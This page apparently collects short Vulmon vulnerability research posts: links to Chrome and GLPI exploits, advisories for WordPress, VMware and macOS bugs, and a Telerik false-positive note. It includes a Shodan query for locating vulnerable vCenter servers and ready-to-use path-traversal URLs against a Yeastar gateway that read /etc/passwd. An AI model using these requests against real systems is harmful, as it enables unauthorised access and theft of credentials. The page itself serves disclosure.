Recent Vulmon Research Posts

Exploit of CVE-2020-16040 Google Chrome <= 87.0.4280.88 vulnerability https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040

CVE-2019-8761 is an interesting macOS bug that lets attackers execute HTML within a TXT file, leak files, and do all sorts of other funky things https://www.paulosyibelo.com/2021/04/this-man-thought-opening-txt-file-is.html

Zoom Unintended Screen Sharing Vulnerability POC:

This looks like a false positive, because: * obtaining the MS AJAX framework script is not a security vulnerability - it is a publicly available script that can also be served from the standard webresource handler * the presence of code that contains the `true` keyword (which is a reserved word in JavaScript as well) does not prove a command was executed on the server * the Telerik WebResource handler is supposed to combine scripts based on server settings and the fact that requesting the handler returns Telerik code is not a vulnerability by itself - this is also code that is publicly avaialble (for example, from the Telerik CDN) and it is a JavaScript code that is not generated based on

I. VULNERABILITY ------------------------- Data Manipulation with X-Forwarded-For header at WordPress II. CVE REFERENCE ------------------------- CVE-2020-35539 III. VENDOR ------------------------- https://wordpress.org IV. TIMELINE ------------------------- 20/12/2020 Vulnerability discovered 21/12/2020 Vendor contacted 09/03/2021 CVE Assigned V. CREDIT ------------------------- Alphan Yavas VI. DESCRIPTION ------------------------- "X-Forwarded-For" is a HTTP header used to carry the client's original IP address. However, because these headers may very well be added by the client to the requests, if the systems/devices use IP addresses which decelerate at X

CVE-2021-21327 recently found in GLPI by Iterasec allows remote PHP objects instantiation Technical writeup and exploit included for research purposes: https://iterasec.com/cve-2021-21327-unsafe-reflection-in-getitemforitemtype-in-glpi/

Shodan dork of CVE-2021-21972 VMware vCenter Server vSphere Client Remote Code Execution: https://www.shodan.io/search?query=http.title:%22ID_VC_Welcome%22

VMware vCenter Server vSphere Client remote code execution Attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy to exploit vulnerability. Therefore future exploitation is likely. Also, this vulnerability exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3 To get firmware decrypting password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect To get /etc/paswd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd https://github.com/SQSamir/CVE-2021-27328